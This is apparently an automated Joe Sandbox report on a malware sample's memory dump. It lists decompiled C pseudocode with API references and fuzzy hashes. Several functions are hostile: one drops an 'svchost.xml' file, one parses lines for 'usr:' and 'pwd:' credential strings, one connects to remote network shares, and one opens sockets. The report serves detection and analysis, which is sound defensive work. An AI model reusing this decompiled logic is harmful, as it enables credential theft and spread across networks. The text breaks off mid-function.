                                                0x02fb31a1
                                                0x02fb31a4
                                                0x02fb31b4
                                                0x02fb31b9
                                                0x02fb31bd
                                                0x02fb31be
                                                0x02fb31c1
                                                0x02fb31c2
                                                0x02fb31ca
                                                0x02fb31d2
                                                0x02fb31d6
                                                0x02fb31da
                                                0x02fb31da
                                                0x02fb31df
                                                0x02fb31e1
                                                0x02fb31e9
                                                0x02fb31eb
                                                0x02fb31eb
                                                0x02fb31e9
                                                0x02fb31df
                                                0x02fb31f3
                                                0x02fb31f3
                                                0x02fb30ea
                                                0x02fb30e8
                                                0x00000000
                                                0x02fb3143
                                                0x02fb3143
                                                0x02fb3145
                                                0x02fb3145
                                                0x02fb314e
                                                0x02fb3150
                                                0x00000000
                                                0x02fb3152
                                                0x00000000
                                                0x02fb3150
                                                0x02fb30bb
                                                0x00000000

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 02FB308B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02FB3105
                                                  • Part of subcall function 02FC3930: __FindPESection.LIBCMT ref: 02FC3989
                                                • _ValidateLocalCookies.LIBCMT ref: 02FB3179
                                                • _ValidateLocalCookies.LIBCMT ref: 02FB31A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: 39eb30acefa11b9670b68b7b4d0a07bca6b8947a6d355f67a39e06c58e2257ac
                                                • Instruction ID: 0f27fb603a4fc47aec503f493919b5eec14b403a4f886b59a5b2fdc4028ade30
                                                • Opcode Fuzzy Hash: 39eb30acefa11b9670b68b7b4d0a07bca6b8947a6d355f67a39e06c58e2257ac
                                                • Instruction Fuzzy Hash: 6A41E731E40208ABDF11DF6ACC50ADEBBBAAF447A8F14C199DA155B351CB31EA05CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA72D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E02FA72D0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				void _v102668;
				long _v102672;
				void* __esi;
				signed int _t16;
				intOrPtr _t26;
				int _t33;
				void* _t39;
				void* _t43;
				intOrPtr _t50;
				void* _t51;
				void* _t55;
				intOrPtr* _t56;
				long _t57;
				void* _t58;
				void* _t59;
				signed int _t60;

				E02FC3CA0();
				_t16 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t16 ^ _t60;
				_t50 = _a4;
				_t39 = __edx;
				_t55 = __ecx;
				E02FB3440(_t50,  &_v268, 0, 0x104);
				E02FA5180( &_v268, 0x104, "%s\\svchost.xml", _t55);
				E02FB3440(_t50,  &_v102668, 0, 0x19000);
				_push(_t50);
				E02FA5180( &_v102668, 0x19000,  *0x2fd682c, _t39);
				_t56 =  &_v102668;
				_t43 = _t56 + 1;
				do {
					_t26 =  *_t56;
					_t56 = _t56 + 1;
				} while (_t26 != 0);
				_v102672 = 0;
				_t57 = _t56 - _t43;
				_t51 = CreateFileA( &_v268, 0x40000000, 2, 0, 2, 0x80, 0);
				if(_t51 == 0) {
					L5:
					_pop(_t58);
					return E02FB0A5D(_v8 ^ _t60, _t58);
				} else {
					_t33 = WriteFile(_t51,  &_v102668, _t57,  &_v102672, 0);
					_push(_t51);
					if(_t33 != 0) {
						CloseHandle();
						_pop(_t59);
						return E02FB0A5D(_v8 ^ _t60, _t59);
					} else {
						CloseHandle();
						goto L5;
					}
				}
			}





















                                                0x02fa72d8
                                                0x02fa72dd
                                                0x02fa72e4
                                                0x02fa72ea
                                                0x02fa72fb
                                                0x02fa72fd
                                                0x02fa72ff
                                                0x02fa7316
                                                0x02fa7329
                                                0x02fa732e
                                                0x02fa7342
                                                0x02fa7347
                                                0x02fa7350
                                                0x02fa7353
                                                0x02fa7353
                                                0x02fa7355
                                                0x02fa7356
                                                0x02fa7372
                                                0x02fa737d
                                                0x02fa7385
                                                0x02fa7389
                                                0x02fa73ae
                                                0x02fa73af
                                                0x02fa73c0
                                                0x02fa738b
                                                0x02fa739d
                                                0x02fa73a3
                                                0x02fa73a6
                                                0x02fa73c1
                                                0x02fa73cd
                                                0x02fa73d9
                                                0x02fa73a8
                                                0x02fa73a8
                                                0x00000000
                                                0x02fa73a8
                                                0x02fa73a6

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 02FA737F
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02FA739D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02FA7878,WIN72K8R2), ref: 02FA73A8
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02FA7878,WIN72K8R2), ref: 02FA73C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: %s\svchost.xml
                                                • API String ID: 3602564925-772174823
                                                • Opcode ID: 20136221194b850006deac793918f2252c9bdb12835289927b3ffe994b8b3786
                                                • Instruction ID: ff7c16d75144cdf989adeb234fb2080a258723a8391242bcaeaefa9bafc91ca9
                                                • Opcode Fuzzy Hash: 20136221194b850006deac793918f2252c9bdb12835289927b3ffe994b8b3786
                                                • Instruction Fuzzy Hash: 5D21F671A8021DBADB20DA61DC59FDAB3BDDF45B84F5000D5FB48A7180CA72A9C48F60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB90F8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E02FB90F8(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x2fd0558; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E02FB78D0(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E02FB7F1D(_t25, __eflags,  *0x2fd0558, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E02FB8F6A(_t25, _t31, 0x2fd6690);
							E02FB7848(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E02FB7848();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E02FB7805(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x2fd0558; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E02FB78D0(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E02FB7F1D(_t27, __eflags,  *0x2fd0558, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E02FB8F6A(_t27, _t32, 0x2fd6690);
									E02FB7848(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E02FB7848();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E02FB7EC7(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E02FB7EC7(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                0x02fb90f8
                                                0x02fb90f8
                                                0x02fb90f8
                                                0x02fb9102
                                                0x02fb9104
                                                0x02fb9109
                                                0x02fb910c
                                                0x02fb911a
                                                0x02fb9121
                                                0x02fb9126
                                                0x02fb9129
                                                0x02fb912c
                                                0x02fb913e
                                                0x02fb9143
                                                0x02fb9145
                                                0x02fb9150
                                                0x02fb9157
                                                0x02fb915c
                                                0x02fb915f
                                                0x02fb9161
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb9147
                                                0x02fb9147
                                                0x00000000
                                                0x02fb9147
                                                0x02fb912e
                                                0x02fb912e
                                                0x02fb912f
                                                0x02fb912f
                                                0x02fb9134
                                                0x02fb916f
                                                0x02fb9170
                                                0x02fb9176
                                                0x02fb917b
                                                0x02fb917e
                                                0x02fb917f
                                                0x02fb9180
                                                0x02fb9187
                                                0x02fb9189
                                                0x02fb918b
                                                0x02fb9190
                                                0x02fb9193
                                                0x02fb91a1
                                                0x02fb91ad
                                                0x02fb91b0
                                                0x02fb91b3
                                                0x02fb91c5
                                                0x02fb91ca
                                                0x02fb91cc
                                                0x02fb91d7
                                                0x02fb91dd
                                                0x02fb91e5
                                                0x02fb91e7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb91ce
                                                0x02fb91ce
                                                0x00000000
                                                0x02fb91ce
                                                0x02fb91b5
                                                0x02fb91b5
                                                0x02fb91b6
                                                0x02fb91b6
                                                0x02fb91e9
                                                0x02fb91ea
                                                0x02fb91ea
                                                0x02fb9195
                                                0x02fb919b
                                                0x02fb919f
                                                0x02fb91f2
                                                0x02fb91f3
                                                0x02fb91f9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb919f
                                                0x02fb9200
                                                0x02fb9200
                                                0x02fb910e
                                                0x02fb9114
                                                0x02fb9118
                                                0x02fb9163
                                                0x02fb9164
                                                0x02fb916e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fb9118

                                                APIs
                                                • GetLastError.KERNEL32(123,?,02FB49AE,?,123,?,02FB7670,02FD0E80,123,?,73B76490,123,?,77109EB0), ref: 02FB90FC
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02FB9164
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02FB9170
                                                • _abort.LIBCMT ref: 02FB9176
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_abort
                                                • String ID: 123
                                                • API String ID: 88804580-2286445522
                                                • Opcode ID: 0c6265963148f9cf0ee58eb450ce2e882d6dea7ae6633248146370037c91f6ee
                                                • Instruction ID: 3c7bef5a40019f2c83db0938c4bb31729ed2141b66a53aa1394969a4a418d5d3
                                                • Opcode Fuzzy Hash: 0c6265963148f9cf0ee58eb450ce2e882d6dea7ae6633248146370037c91f6ee
                                                • Instruction Fuzzy Hash: 58F0813BE8460566E61336376C0CFEA766B9FC27F1F350418FB19E6280EFA094119D61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB65BE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02FB65B3,00000002,?,02FB6553,00000002,02FCDED8,0000000C,02FB6666,00000002), ref: 02FB65DE
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02FB65F1
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,02FB65B3,00000002,?,02FB6553,00000002,02FCDED8,0000000C,02FB6666,00000002), ref: 02FB6614
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 5e2f64f1adf7d3f5f6a4c2393444c761d5daa32a8165a28ae7474071228c6cd6
                                                • Instruction ID: 22593b9049c7cd45382ca20210d7b2014baa2f624e53db3fb1fce968b92ff68b
                                                • Opcode Fuzzy Hash: 5e2f64f1adf7d3f5f6a4c2393444c761d5daa32a8165a28ae7474071228c6cd6
                                                • Instruction Fuzzy Hash: F0F08C30E4420DBBEB129BA1D949BDEBBB9EF04796F600068A906E6240CB319950CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA9020 Relevance: 7.6, APIs: 5, Instructions: 66networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: connectgethostbynamehtonssocket
                                                • String ID:
                                                • API String ID: 3705698054-0
                                                • Opcode ID: 1572781591347c1afdb012644b479e6241c341b3da96fe0924a3c698651a0a85
                                                • Instruction ID: 9689e26c58563516fda03436f068e8702bc1b7bc569e62ebf0230b015aebb6dd
                                                • Opcode Fuzzy Hash: 1572781591347c1afdb012644b479e6241c341b3da96fe0924a3c698651a0a85
                                                • Instruction Fuzzy Hash: FB21A231A40209AFC711DFA8C905BEFF7F8FF55790F10416AEA05AB240DBB0AA108BD5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA94A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 95%
                                                			E02FA94A0(void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int _a4) {
				signed int _v8;
				char _v258;
				char _v264;
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				void* __esi;
				void* __ebp;
				signed int _t60;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				intOrPtr _t77;
				intOrPtr _t82;
				signed int _t84;
				void* _t88;
				intOrPtr _t90;
				signed int _t91;
				intOrPtr _t93;
				void* _t95;
				intOrPtr _t97;
				void* _t98;
				signed int _t101;
				intOrPtr* _t105;
				intOrPtr* _t106;
				signed int _t107;
				char _t108;
				void* _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				signed int _t117;
				intOrPtr _t118;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t128;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t134;

				_t102 = __ecx;
				_t60 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t60 ^ _t128;
				_t101 = _a4;
				_t117 = __edx;
				_t118 = E02FB5E17(__ecx, "r");
				_t130 = _t129 + 8;
				_v524 = _t118;
				_t135 = _t118;
				if(_t118 == 0) {
					L37:
					return E02FB0A5D(_v8 ^ _t128, _t118);
				}
				E02FB3440(__edx,  &_v264, 0, 0x100);
				_t67 = E02FB5FE9(_t135,  &_v264, 0x100, _t118);
				_t131 = _t130 + 0x18;
				if(_t67 == 0) {
					L36:
					_push(_t118);
					E02FB5EA4(_t102, _t152);
					goto L37;
				} else {
					do {
						_t105 =  &_v264;
						_t110 = _t105 + 1;
						do {
							_t69 =  *_t105;
							_t105 = _t105 + 1;
						} while (_t69 != 0);
						_t102 = _t105 - _t110;
						if(_t102 > 0x80 || _t102 < 6) {
							L35:
							_t118 = _v524;
							goto L36;
						} else {
							E02FB76F4( &_v264, " usr: ", 6);
							_t120 =  ==  ? 1 : 0;
							_t74 = E02FB76F4( &_v264, " pwd: ", 6);
							_t131 = _t131 + 0x18;
							if(_t74 != 0) {
								__eflags = _t120;
								if(__eflags == 0) {
									goto L35;
								}
								L10:
								E02FB3440(_t117,  &_v520, 0, 0x100);
								_t106 =  &_v264;
								_t133 = _t131 + 0xc;
								_t111 = _t106 + 1;
								do {
									_t77 =  *_t106;
									_t106 = _t106 + 1;
								} while (_t77 != 0);
								_t102 = _t106 - _t111;
								E02FC3DB0( &_v520,  &_v258, _t106 - _t111 - 7);
								_t134 = _t133 + 0xc;
								_t121 = _t120 - 1;
								if(_t121 == 0) {
									_t122 = 0;
									__eflags =  *(_t117 + 0x20);
									if(__eflags <= 0) {
										L29:
										_t82 = E02FB0A6E(_t122, __eflags, 0x100);
										_t112 =  &_v520;
										_v532 = _t82;
										_t134 = _t134 + 4;
										_t124 = _t82 - _t112;
										__eflags = _t124;
										do {
											_t107 =  *_t112;
											_t112 = _t112 + 1;
											 *((char*)(_t124 + _t112 - 1)) = _t107;
											__eflags = _t107;
										} while (_t107 != 0);
										_t102 = _t117;
										_t84 = E02FA6F70(_t117);
										__eflags = _t84;
										if(_t84 != 0) {
											_t102 =  *(_t117 + 0x20);
											 *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) +  *(_t117 + 0x20) * 4)) = _v532;
											_t53 = _t117 + 0x20;
											 *_t53 =  *(_t117 + 0x20) + 1;
											__eflags =  *_t53;
										}
										goto L33;
									} else {
										goto L25;
									}
									while(1) {
										L25:
										_t90 = 0;
										__eflags = _t122 -  *(_t117 + 0x20);
										if(_t122 <  *(_t117 + 0x20)) {
											_t90 =  *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) + _t122 * 4));
										}
										_t102 =  &_v520;
										_t91 = E02FB7612(_t117, _t122, _t90,  &_v520);
										_t134 = _t134 + 8;
										__eflags = _t91;
										if(_t91 == 0) {
											goto L33;
										}
										_t122 = _t122 + 1;
										__eflags = _t122 -  *(_t117 + 0x20);
										if(__eflags < 0) {
											continue;
										}
										goto L29;
									}
									goto L33;
								}
								_t125 = _t121 - 1;
								if(_t125 != 0) {
									goto L33;
								}
								if( *(_t101 + 0x20) <= _t125) {
									L20:
									_t93 = E02FB0A6E(_t125, _t149, 0x100);
									_t114 =  &_v520;
									_v528 = _t93;
									_t134 = _t134 + 4;
									_t127 = _t93 - _t114;
									asm("o16 nop [eax+eax]");
									do {
										_t108 =  *_t114;
										_t114 = _t114 + 1;
										 *((char*)(_t127 + _t114 - 1)) = _t108;
									} while (_t108 != 0);
									_t102 = _t101;
									_t95 = E02FA6F70(_t101);
									_t151 = _t95;
									if(_t95 != 0) {
										_t102 =  *(_t101 + 0x20);
										 *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) +  *(_t101 + 0x20) * 4)) = _v528;
										 *(_t101 + 0x20) =  *(_t101 + 0x20) + 1;
									}
									goto L33;
								}
								while(1) {
									_t97 = 0;
									if(_t125 <  *(_t101 + 0x20)) {
										_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) + _t125 * 4));
									}
									_t102 =  &_v520;
									_t98 = E02FB7612(_t117, _t125, _t97,  &_v520);
									_t134 = _t134 + 8;
									if(_t98 == 0) {
										goto L33;
									}
									_t125 = _t125 + 1;
									_t149 = _t125 -  *(_t101 + 0x20);
									if(_t125 <  *(_t101 + 0x20)) {
										continue;
									}
									goto L20;
								}
								goto L33;
							}
							_t10 = _t74 + 2; // 0x2
							_t120 = _t10;
							goto L10;
						}
						L33:
						E02FB3440(_t117,  &_v264, 0, 0x100);
						_t118 = _v524;
						_t88 = E02FB5FE9(_t151,  &_v264, 0x100, _t118);
						_t131 = _t134 + 0x18;
						_t152 = _t88;
					} while (_t88 != 0);
					goto L36;
				}
			}

















































                                                0x02fa94a0
                                                0x02fa94a9
                                                0x02fa94b0
                                                0x02fa94b4
                                                0x02fa94bf
                                                0x02fa94c6
                                                0x02fa94c8
                                                0x02fa94cb
                                                0x02fa94d1
                                                0x02fa94d3
                                                0x02fa9721
                                                0x02fa9731
                                                0x02fa9731
                                                0x02fa94e7
                                                0x02fa94f9
                                                0x02fa94fe
                                                0x02fa9503
                                                0x02fa9718
                                                0x02fa9718
                                                0x02fa9719
                                                0x00000000
                                                0x02fa9510
                                                0x02fa9510
                                                0x02fa9510
                                                0x02fa9518
                                                0x02fa9520
                                                0x02fa9520
                                                0x02fa9522
                                                0x02fa9523
                                                0x02fa9527
                                                0x02fa952f
                                                0x02fa9712
                                                0x02fa9712
                                                0x00000000
                                                0x02fa953e
                                                0x02fa954c
                                                0x02fa955a
                                                0x02fa9569
                                                0x02fa956e
                                                0x02fa9573
                                                0x02fa957a
                                                0x02fa957c
                                                0x00000000
                                                0x00000000
                                                0x02fa9582
                                                0x02fa9590
                                                0x02fa9595
                                                0x02fa959b
                                                0x02fa959e
                                                0x02fa95a1
                                                0x02fa95a1
                                                0x02fa95a3
                                                0x02fa95a4
                                                0x02fa95a8
                                                0x02fa95bc
                                                0x02fa95c1
                                                0x02fa95c4
                                                0x02fa95c7
                                                0x02fa9660
                                                0x02fa9662
                                                0x02fa9665
                                                0x02fa968e
                                                0x02fa9693
                                                0x02fa9698
                                                0x02fa969e
                                                0x02fa96a6
                                                0x02fa96ab
                                                0x02fa96ab
                                                0x02fa96b0
                                                0x02fa96b0
                                                0x02fa96b2
                                                0x02fa96b5
                                                0x02fa96b9
                                                0x02fa96b9
                                                0x02fa96bd
                                                0x02fa96bf
                                                0x02fa96c4
                                                0x02fa96c6
                                                0x02fa96c8
                                                0x02fa96d4
                                                0x02fa96d7
                                                0x02fa96d7
                                                0x02fa96d7
                                                0x02fa96d7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa9667
                                                0x02fa9667
                                                0x02fa9667
                                                0x02fa9669
                                                0x02fa966c
                                                0x02fa9671
                                                0x02fa9671
                                                0x02fa9674
                                                0x02fa967c
                                                0x02fa9681
                                                0x02fa9684
                                                0x02fa9686
                                                0x00000000
                                                0x00000000
                                                0x02fa9688
                                                0x02fa9689
                                                0x02fa968c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa968c
                                                0x00000000
                                                0x02fa9667
                                                0x02fa95cd
                                                0x02fa95d0
                                                0x00000000
                                                0x00000000
                                                0x02fa95d9
                                                0x02fa960b
                                                0x02fa9610
                                                0x02fa9615
                                                0x02fa961b
                                                0x02fa9623
                                                0x02fa9628
                                                0x02fa962a
                                                0x02fa9630
                                                0x02fa9630
                                                0x02fa9632
                                                0x02fa9635
                                                0x02fa9639
                                                0x02fa963d
                                                0x02fa963f
                                                0x02fa9644
                                                0x02fa9646
                                                0x02fa964c
                                                0x02fa9658
                                                0x02fa965b
                                                0x02fa965b
                                                0x00000000
                                                0x02fa9646
                                                0x02fa95e0
                                                0x02fa95e0
                                                0x02fa95e5
                                                0x02fa95ea
                                                0x02fa95ea
                                                0x02fa95ed
                                                0x02fa95f5
                                                0x02fa95fa
                                                0x02fa95ff
                                                0x00000000
                                                0x00000000
                                                0x02fa9605
                                                0x02fa9606
                                                0x02fa9609
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa9609
                                                0x00000000
                                                0x02fa95e0
                                                0x02fa9575
                                                0x02fa9575
                                                0x00000000
                                                0x02fa9575
                                                0x02fa96da
                                                0x02fa96e8
                                                0x02fa96ed
                                                0x02fa9700
                                                0x02fa9705
                                                0x02fa9708
                                                0x02fa9708
                                                0x00000000
                                                0x02fa9710

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: pwd: $ usr:
                                                • API String ID: 0-3899161880
                                                • Opcode ID: c75959971beebcae6f9f3656a1d5cb98953fc744a3c7deb2469ea80035bcf418
                                                • Instruction ID: a9e923c4fd7c243f7450cbaac57187e76b2497e3fec31919b9028db7de0a7cf9
                                                • Opcode Fuzzy Hash: c75959971beebcae6f9f3656a1d5cb98953fc744a3c7deb2469ea80035bcf418
                                                • Instruction Fuzzy Hash: 3C61D4B5D002159BCF25DF64CD94BE9B3B9AF09384F0445E4DE49AB241E7B1EA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAB0F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78shareCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 70%
                                                			E02FAB0F0(intOrPtr* __ecx, char* __edx, void* __edi, char* _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				char* _v560;
				int _v576;
				struct _NETRESOURCE _v580;
				char* _v584;
				char* _v588;
				void* __esi;
				signed int _t23;
				intOrPtr* _t26;
				char _t42;
				intOrPtr* _t51;
				void* _t56;
				long _t57;
				void* _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;
				signed int _t63;

				_t62 = (_t60 & 0xfffffff0) - 0x248;
				_t23 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t23 ^ _t62;
				_t51 = __ecx;
				_v584 = _a4;
				_v588 = __edx;
				_t26 = __ecx;
				_t56 =  &_v540 - __ecx;
				do {
					_t42 =  *_t26;
					_t26 = _t26 + 1;
					 *((char*)(_t56 + _t26 - 1)) = _t42;
				} while (_t42 != 0);
				E02FAA2B0( &_v540);
				E02FA3F90( &_v540,  &_v276, "\\\\%s",  &_v540);
				_t63 = _t62 + 0xc;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x20], xmm0");
				_v560 =  &_v276;
				asm("movaps [esp+0x18], xmm0");
				_v576 = 0;
				_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
				if(_t57 != 0) {
					if(_t57 != 0x4c3) {
						L6:
						SetLastError(_t57);
						_pop(_t58);
						return E02FB0A5D(_v8 ^ _t63, _t58);
					} else {
						E02FAB1F0(_t51, _t57);
						_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
						if(_t57 == 0) {
							goto L3;
						} else {
							goto L6;
						}
					}
				} else {
					L3:
					_pop(_t59);
					return E02FB0A5D(_v8 ^ _t63, _t59);
				}
			}























                                                0x02fab0f6
                                                0x02fab0fc
                                                0x02fab103
                                                0x02fab10f
                                                0x02fab111
                                                0x02fab119
                                                0x02fab11d
                                                0x02fab11f
                                                0x02fab121
                                                0x02fab121
                                                0x02fab123
                                                0x02fab126
                                                0x02fab12a
                                                0x02fab132
                                                0x02fab149
                                                0x02fab14e
                                                0x02fab158
                                                0x02fab15b
                                                0x02fab160
                                                0x02fab16e
                                                0x02fab177
                                                0x02fab186
                                                0x02fab18a
                                                0x02fab1a8
                                                0x02fab1cc
                                                0x02fab1cd
                                                0x02fab1dd
                                                0x02fab1e8
                                                0x02fab1aa
                                                0x02fab1ac
                                                0x02fab1c6
                                                0x02fab1ca
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fab1ca
                                                0x02fab18c
                                                0x02fab18c
                                                0x02fab18f
                                                0x02fab1a1
                                                0x02fab1a1

                                                APIs
                                                • WNetAddConnection2A.MPR(?), ref: 02FAB180
                                                • SetLastError.KERNEL32(00000000), ref: 02FAB1CD
                                                  • Part of subcall function 02FAB1F0: WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 02FAB24E
                                                • WNetAddConnection2A.MPR(?,?,?,00000000), ref: 02FAB1C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Connection2$CancelErrorLast
                                                • String ID: \\%s
                                                • API String ID: 4062109977-3838199987
                                                • Opcode ID: 9d407ba60a4f230210df1cf7c1238327d68cdc9f46c02c874683069f347772ab
                                                • Instruction ID: 3d8ea790d03cc58bdd57a4aa06228231f2425e4dda0e887e7d33aa2fac27df2f
                                                • Opcode Fuzzy Hash: 9d407ba60a4f230210df1cf7c1238327d68cdc9f46c02c874683069f347772ab
                                                • Instruction Fuzzy Hash: EF21B4719083459BD721DF64D814BDBFBE9EFC9354F404A1EFA89D3250EB30A5088B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FAA630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 91%
                                                			E02FAA630(void* __ecx, long __edx, WCHAR* _a4) {
				long _v8;
				int _t10;
				void* _t16;
				void* _t25;
				long _t30;

				_push(__ecx);
